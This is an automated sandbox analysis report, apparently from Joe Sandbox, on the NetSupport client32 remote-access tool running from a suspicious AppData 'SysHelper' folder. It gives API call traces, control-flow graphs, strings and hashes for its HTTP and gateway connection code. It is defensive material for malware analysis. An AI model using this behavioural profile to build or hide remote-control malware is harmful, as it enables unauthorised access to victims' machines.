                                                                                                                        • GetLastError.KERNEL32 ref: 1109DA0A
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109DA0D
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109DA35
                                                                                                                        • LocalFree.KERNEL32(?), ref: 1109DA42
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1109DA73
                                                                                                                        • CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DABC
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DAC2
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 1109DAC8
                                                                                                                        • SetEvent.KERNEL32(?), ref: 1109DACE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                        • API String ID: 3291243470-2792520954
                                                                                                                        • Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                        • Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
                                                                                                                        • Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                        • Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 742 685a7030-685a7050 call 68592a90 call 685adbd0 747 685a7052-685a7095 LoadLibraryA 742->747 748 685a7097 742->748 749 685a7099-685a70f8 call 68598d00 InitializeCriticalSection CreateEventA 747->749 748->749 752 685a70fa-685a710e call 68596f50 749->752 753 685a7111-685a711e CreateEventA 749->753 752->753 755 685a7120-685a7134 call 68596f50 753->755 756 685a7137-685a7144 CreateEventA 753->756 755->756 758 685a715d-685a7170 WSAStartup 756->758 759 685a7146-685a715a call 68596f50 756->759 763 685a7172-685a7182 call 68595290 call 68592b70 758->763 764 685a7183-685a71b2 call 685b1b69 758->764 759->758 771 685a71d0-685a71e4 call 685b1c50 764->771 772 685a71b4-685a71cd call 68596f50 764->772 778 685a71fa-685a7202 771->778 779 685a71e6-685a71e9 771->779 772->771 781 685a7209-685a7223 call 685b3753 778->781 782 685a7204 778->782 779->778 780 685a71eb-685a71f1 779->780 780->778 783 685a71f3-685a71f8 780->783 786 685a723c-685a7255 call 685a9bf0 781->786 787 685a7225-685a7239 call 68596f50 781->787 782->781 783->781 792 685a726a-685a7271 call 68595730 786->792 793 685a7257-685a725e 786->793 787->786 797 685a730b-685a7310 792->797 798 685a7277-685a729a call 685b1b69 792->798 794 685a7260-685a7268 793->794 794->792 794->794 800 685a731e-685a7336 call 68595e90 call 68595530 797->800 801 685a7312-685a7315 797->801 805 685a72be-685a72dc call 685b1c50 call 685b1b69 798->805 806 685a729c-685a72bb call 68596f50 798->806 807 685a7339-685a7354 call 68595e90 800->807 801->800 803 685a7317-685a731c 801->803 803->800 803->807 823 685a72fa-685a7308 call 685b1c50 805->823 824 685a72de-685a72f7 call 68596f50 805->824 806->805 818 685a7361-685a738b GetTickCount CreateThread 807->818 819 685a7356-685a735c 807->819 821 685a73a9-685a73b6 SetThreadPriority 818->821 822 685a738d-685a73a6 call 68596f50 818->822 819->818 826 685a73b8-685a73cc call 68596f50 821->826 827 685a73cf-685a73ed call 68595f20 call 68595e90 821->827 822->821 823->797 824->823 826->827 839 685a73ef 827->839 840 685a73f5-685a73f7 827->840 839->840 841 685a73f9-685a7407 call 685adbd0 840->841 842 685a7425-685a7447 GetModuleFileNameA call 68592420 840->842 847 685a7409-685a741c call 68594580 841->847 848 685a741e 841->848 849 685a7449-685a744a 842->849 850 685a744c 842->850 853 685a7420 847->853 848->853 851 685a7451-685a746d 849->851 850->851 854 685a7470-685a747f 851->854 853->842 854->854 856 685a7481-685a7486 854->856 857 685a7487-685a748d 856->857 857->857 858 685a748f-685a74c8 GetPrivateProfileIntA GetModuleHandleA 857->858 859 685a74ce-685a74fa call 68595e90 * 2 858->859 860 685a7563-685a758f CreateMutexA timeBeginPeriod 858->860 865 685a74fc-685a7511 call 68595e90 859->865 866 685a7536-685a755d call 68595e90 * 2 859->866 872 685a752a-685a7530 865->872 873 685a7513-685a7528 call 68595e90 865->873 866->860 872->866 873->866 873->872
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 68592A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 68592ACB
                                                                                                                          • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592ADA
                                                                                                                          • Part of subcall function 68592A90: _strrchr.LIBCMT ref: 68592AEA
                                                                                                                          • Part of subcall function 68592A90: wsprintfA.USER32 ref: 68592B05
                                                                                                                          • Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
                                                                                                                          • Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
                                                                                                                          • Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27
                                                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll), ref: 685A7057
                                                                                                                        • InitializeCriticalSection.KERNEL32(685DB898), ref: 685A70DF
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A70EF
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A7115
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 685A713B
                                                                                                                        • WSAStartup.WSOCK32(00000101,685DB91A), ref: 685A7167
                                                                                                                        • _malloc.LIBCMT ref: 685A71A3
                                                                                                                          • Part of subcall function 685B1B69: __FF_MSGBANNER.LIBCMT ref: 685B1B82
                                                                                                                          • Part of subcall function 685B1B69: __NMSG_WRITE.LIBCMT ref: 685B1B89
                                                                                                                          • Part of subcall function 685B1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,685BD3C1,685B6E81,00000001,685B6E81,?,685BF447,00000018,685D7738,0000000C,685BF4D7), ref: 685B1BAE
                                                                                                                        • _memset.LIBCMT ref: 685A71D3
                                                                                                                        • _calloc.LIBCMT ref: 685A7214
                                                                                                                        • _malloc.LIBCMT ref: 685A728B
                                                                                                                        • _memset.LIBCMT ref: 685A72C1
                                                                                                                        • _malloc.LIBCMT ref: 685A72CD
                                                                                                                        • _memset.LIBCMT ref: 685A7303
                                                                                                                        • GetTickCount.KERNEL32 ref: 685A7361
                                                                                                                        • CreateThread.KERNEL32(00000000,00004000,685A6BA0,00000000,00000000,685DBACC), ref: 685A737E
                                                                                                                        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 685A73AC
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\Support\,00000104), ref: 685A7430
                                                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini), ref: 685A74B0
                                                                                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 685A74C0
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 685A7566
                                                                                                                        • timeBeginPeriod.WINMM(00000001), ref: 685A7573
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                                        • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$226546$C:\Users\user\AppData\Roaming\SysHelper\Support\$C:\Users\user\AppData\Roaming\SysHelper\Support\pci.ini$General$HTCTL32$NSM832428$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                                        • API String ID: 3160247386-2998043124
                                                                                                                        • Opcode ID: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
                                                                                                                        • Instruction ID: bf6727e0cf09bfdcc17968a086c2d736e5d68eb3cb2f468a3d27a176817d2a7a
                                                                                                                        • Opcode Fuzzy Hash: 358fa19de47a9d42cca085a42e9e9b1970fbc8db8da311e552db64a93da40cca
                                                                                                                        • Instruction Fuzzy Hash: E3D1F6B5940305AFDB10AF688CC496E7BF9EB49348BC6442AFD59D7341E770AC408B9D

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 877 11029230-110292be LoadLibraryA 878 110292c1-110292c6 877->878 879 110292c8-110292cb 878->879 880 110292cd-110292d0 878->880 881 110292e5-110292ea 879->881 882 110292d2-110292d5 880->882 883 110292d7-110292e2 880->883 884 11029319-11029325 881->884 885 110292ec-110292f1 881->885 882->881 883->881 888 110293ca-110293cd 884->888 889 1102932b-11029343 call 1115f321 884->889 886 110292f3-1102930a GetProcAddress 885->886 887 1102930c-1102930f 885->887 886->887 890 11029311-11029313 SetLastError 886->890 887->884 892 110293e8-11029400 InternetOpenA 888->892 893 110293cf-110293e6 GetProcAddress 888->893 899 11029364-11029370 889->899 900 11029345-1102935e GetProcAddress 889->900 890->884 897 11029424-11029430 call 1115f3b5 892->897 893->892 896 11029419-11029421 SetLastError 893->896 896->897 904 11029436-11029467 call 1113e8f0 call 11160b10 897->904 905 110296aa-110296b4 897->905 903 11029372-1102937b GetLastError 899->903 907 11029391-11029393 899->907 900->899 902 11029402-1102940a SetLastError 900->902 902->903 903->907 908 1102937d-1102938f call 1115f3b5 call 1115f321 903->908 928 11029469-1102946c 904->928 929 1102946f-11029484 call 11080b10 * 2 904->929 905->878 910 110296ba 905->910 912 110293b0-110293bc 907->912 913 11029395-110293ae GetProcAddress 907->913 908->907 915 110296cc-110296cf 910->915 912->888 932 110293be-110293c7 912->932 913->912 917 1102940f-11029417 SetLastError 913->917 919 110296d1-110296d6 915->919 920 110296db-110296de 915->920 917->888 924 1102983f-11029847 919->924 925 110296e0-110296e5 920->925 926 110296ea 920->926 930 11029850-11029863 924->930 931 11029849-1102984a FreeLibrary 924->931 933 1102980f-11029814 925->933 934 110296ed-110296f5 926->934 928->929 950 11029486-1102948a 929->950 951 1102948d-11029499 929->951 931->930 932->888 937 11029816-1102982d GetProcAddress 933->937 938 1102982f-11029835 933->938 935 110296f7-1102970e GetProcAddress 934->935 936 11029714-1102971d 934->936 935->936 940 110297ce-110297d0 SetLastError 935->940 943 11029720-11029722 936->943 937->938 941 11029837-11029839 SetLastError 937->941 938->924 945 110297d6-110297dd 940->945 941->924 943->945 947 11029728-1102972d 943->947 948 110297ec-1102980d call 11027510 * 2 945->948 947->948 952 11029733-1102976f call 1110c4a0 call 110274c0 947->952 948->933 950->951 955 110294c4-110294c9 951->955 956 1102949b-1102949d 951->956 978 11029781-11029783 952->978 979 11029771-11029774 952->979 962 110294cb-110294dc GetProcAddress 955->962 963 110294de-110294f5 InternetConnectA 955->963 959 110294b4-110294ba 956->959 960 1102949f-110294b2 GetProcAddress 956->960 959->955 960->959 965 110294bc-110294be SetLastError 960->965 962->963 967 11029521-1102952c SetLastError 962->967 968 11029697-110296a7 call 1115e091 963->968 969 110294fb-110294fe 963->969 965->955 967->968 968->905 973 11029500-11029502 969->973 974 11029539-11029541 969->974 980 11029504-11029517 GetProcAddress 973->980 981 11029519-1102951f 973->981 976 11029543-11029557 GetProcAddress 974->976 977 11029559-11029574 974->977 976->977 982 11029576-1102957e SetLastError 976->982 991 11029581-11029584 977->991 984 11029785 978->984 985 1102978c-11029791 978->985 979->978 983 11029776-1102977a 979->983 980->981 986 11029531-11029533 SetLastError 980->986 981->974 982->991 983->978 992 1102977c 983->992 984->985 987 11029793-110297a9 call 110cedc0 985->987 988 110297ac-110297ae 985->988 986->974 987->988 994 110297b0-110297b2 988->994 995 110297b4-110297c5 call 1115e091 988->995 996 11029692-11029695 991->996 997 1102958a-1102958f 991->997 992->978 994->995 1000 110297df-110297e9 call 1115e091 994->1000 995->948 1009 110297c7-110297c9 995->1009 996->968 999 110296bc-110296c9 call 1115e091 996->999 1002 11029591-110295a8 GetProcAddress 997->1002 1003 110295aa-110295b6 997->1003 999->915 1000->948 1002->1003 1007 110295b8-110295c0 SetLastError 1002->1007 1008 110295c2-110295db GetLastError 1003->1008 1007->1008 1013 110295f6-1102960b 1008->1013 1014 110295dd-110295f4 GetProcAddress 1008->1014 1009->934 1017 11029615-11029623 GetLastError 1013->1017 1014->1013 1015 1102960d-1102960f SetLastError 1014->1015 1015->1017 1018 11029625-1102962a 1017->1018 1019 1102962c-11029638 GetDesktopWindow 1017->1019 1018->1019 1020 11029682-11029687 1018->1020 1021 11029653-1102966f 1019->1021 1022 1102963a-11029651 GetProcAddress 1019->1022 1020->996 1023 11029689-1102968f 1020->1023 1021->996 1026 11029671 1021->1026 1022->1021 1024 11029676-11029680 SetLastError 1022->1024 1023->996 1024->996 1026->991
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll,7E4636A2,74DF23A0,?,00000000), ref: 11029265
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029313
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
                                                                                                                        • GetLastError.KERNEL32 ref: 11029372
                                                                                                                        • _free.LIBCMT ref: 1102937E
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
                                                                                                                        • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029404
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029411
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102941B
                                                                                                                        • _free.LIBCMT ref: 11029425
                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 110294BE
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
                                                                                                                        • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029523
                                                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
                                                                                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 110297D0
                                                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029839
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 1102984A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free$ConnectHeapLoadOpen
                                                                                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                        • API String ID: 3391987931-913974648
                                                                                                                        • Opcode ID: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
                                                                                                                        • Instruction ID: 8a892d803199c7046cb733a2a01a4e5fa1610c0a6219e27d09306c56163d799e
                                                                                                                        • Opcode Fuzzy Hash: 3d8697c672572dd310c1a2e1d47d1d0dada750d652324d085b14bc85afb6b7cf
                                                                                                                        • Instruction Fuzzy Hash: AA127FB1E002299BDB11CFA9CC88A9EFBF4FF88344F60856AE555F7240EB745940CB61

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1415 6859a980-6859a9e7 call 68595840 1418 6859a9ed-6859a9f0 1415->1418 1419 6859aa9c 1415->1419 1418->1419 1421 6859a9f6-6859a9fb 1418->1421 1420 6859aaa2-6859aaae 1419->1420 1422 6859aab0-6859aac5 call 685b28e1 1420->1422 1423 6859aac6-6859aacd 1420->1423 1421->1419 1424 6859aa01-6859aa06 1421->1424 1427 6859ab48-6859ab58 socket 1423->1427 1428 6859aacf-6859aad7 1423->1428 1424->1419 1426 6859aa0c-6859aa21 EnterCriticalSection 1424->1426 1432 6859aa89-6859aa9a LeaveCriticalSection 1426->1432 1433 6859aa23-6859aa2b 1426->1433 1429 6859ab5a-6859ab6f WSAGetLastError call 685b28e1 1427->1429 1430 6859ab70-6859abc9 #21 * 2 call 68595e90 1427->1430 1428->1427 1434 6859aad9-6859aadc 1428->1434 1444 6859abe8-6859ac1f bind 1430->1444 1445 6859abcb-6859abe3 #21 1430->1445 1432->1420 1437 6859aa30-6859aa39 1433->1437 1434->1427 1438 6859aade-6859ab05 call 6859a5c0 1434->1438 1441 6859aa49-6859aa51 1437->1441 1442 6859aa3b-6859aa3f 1437->1442 1452 6859ab0b-6859ab2f WSAGetLastError call 685930a0 1438->1452 1453 6859ad4a-6859ad69 EnterCriticalSection 1438->1453 1441->1437 1448 6859aa53-6859aa5e LeaveCriticalSection 1441->1448 1442->1441 1446 6859aa41-6859aa47 1442->1446 1449 6859ac41-6859ac49 1444->1449 1450 6859ac21-6859ac40 WSAGetLastError closesocket call 685b28e1 1444->1450 1445->1444 1446->1441 1451 6859aa60-6859aa88 LeaveCriticalSection call 685b28e1 1446->1451 1448->1420 1459 6859ac59-6859ac64 1449->1459 1460 6859ac4b-6859ac57 1449->1460 1462 6859ae82-6859ae92 call 685b28e1 1452->1462 1471 6859ab35-6859ab47 call 685b28e1 1452->1471 1454 6859ad6f-6859ad7d 1453->1454 1455 6859ae50-6859ae80 LeaveCriticalSection GetTickCount InterlockedExchange 1453->1455 1463 6859ad80-6859ad86 1454->1463 1455->1462 1461 6859ac65-6859ac83 htons WSASetBlockingHook call 68597610 1459->1461 1460->1461 1472 6859ac88-6859ac8d 1461->1472 1469 6859ad88-6859ad90 1463->1469 1470 6859ad97-6859ae0f InitializeCriticalSection call 68598fb0 call 685b0ef0 1463->1470 1469->1463 1474 6859ad92 1469->1474 1490 6859ae18-6859ae4b getsockname 1470->1490 1491 6859ae11 1470->1491 1478 6859ac8f-6859acc5 WSAGetLastError WSAUnhookBlockingHook closesocket call 685930a0 call 685b28e1 1472->1478 1479 6859acc6-6859accd 1472->1479 1474->1455 1482 6859accf-6859acd6 1479->1482 1483 6859ad45 WSAUnhookBlockingHook 1479->1483 1482->1483 1486 6859acd8-6859acfb call 6859a5c0 1482->1486 1483->1453 1486->1483 1494 6859acfd-6859ad2c WSAGetLastError WSAUnhookBlockingHook closesocket call 685930a0 1486->1494 1490->1455 1491->1490 1494->1462 1497 6859ad32-6859ad44 call 685b28e1 1494->1497
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,?,00000000,00000000), ref: 6859AA11
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA58
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA68
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AA94
                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,00000000,00000000), ref: 6859AB0B
                                                                                                                        • socket.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB4E
                                                                                                                        • WSAGetLastError.WSOCK32(00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB5A
                                                                                                                        • #21.WSOCK32(00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AB8E
                                                                                                                        • #21.WSOCK32(00000000,0000FFFF,00000080,?,00000004,00000000,0000FFFF,00001001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABB1
                                                                                                                        • #21.WSOCK32(00000000,00000006,00000001,?,00000004,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ABE3
                                                                                                                        • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC18
                                                                                                                        • WSAGetLastError.WSOCK32(00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC21
                                                                                                                        • closesocket.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC29
                                                                                                                        • htons.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC65
                                                                                                                        • WSASetBlockingHook.WSOCK32(685963A0,00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC76
                                                                                                                        • WSAGetLastError.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC8F
                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC96
                                                                                                                        • closesocket.WSOCK32(00000000,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AC9C
                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859ACFD
                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD04
                                                                                                                        • closesocket.WSOCK32(00000000,?,?,?,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD0A
                                                                                                                        • WSAUnhookBlockingHook.WSOCK32(00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD45
                                                                                                                        • EnterCriticalSection.KERNEL32(685DB898,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6859AD4F
                                                                                                                        • InitializeCriticalSection.KERNEL32(-685DCB4A), ref: 6859ADE6
                                                                                                                          • Part of subcall function 68598FB0: _memset.LIBCMT ref: 68598FE4
                                                                                                                          • Part of subcall function 68598FB0: getsockname.WSOCK32(?,?,00000010,?,02B42E90,?), ref: 68599005
                                                                                                                        • getsockname.WSOCK32(00000000,?,?), ref: 6859AE4B
                                                                                                                        • LeaveCriticalSection.KERNEL32(685DB898), ref: 6859AE60
                                                                                                                        • GetTickCount.KERNEL32 ref: 6859AE6C
                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 6859AE7A
                                                                                                                        Strings
                                                                                                                        • Cannot connect to gateway %s, error %d, xrefs: 6859ACA6
                                                                                                                        • Cannot connect to gateway %s via web proxy, error %d, xrefs: 6859AD14
                                                                                                                        • Connect error to %s using hijacked socket, error %d, xrefs: 6859AB17
                                                                                                                        • *TcpNoDelay, xrefs: 6859ABB8
                                                                                                                        Memory Dump Source
